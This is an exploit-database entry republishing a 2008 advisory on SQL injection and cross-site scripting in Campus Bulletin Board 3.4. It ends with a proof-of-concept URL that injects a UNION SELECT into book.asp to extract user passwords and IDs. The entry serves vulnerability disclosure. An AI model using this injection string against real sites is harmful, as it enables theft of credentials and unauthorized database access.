Campus Bulletin Board 3.4 - '/post3/book.asp?review' SQL Injection

Author: Unohope
type: webapps
platform: asp
port: 
date_added: 2008-05-26  
date_updated: 2014-02-23  
verified: 1  
codes: CVE-2008-2492;OSVDB-45731  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 31852.txt

source: https://www.securityfocus.com/bid/29375/info

Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.

http://www.example.com/post3/book.asp?review=-99&#039;)+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+&#20844;&#20296;&#27396
;+Where+&#039;%&#039;=(&#039;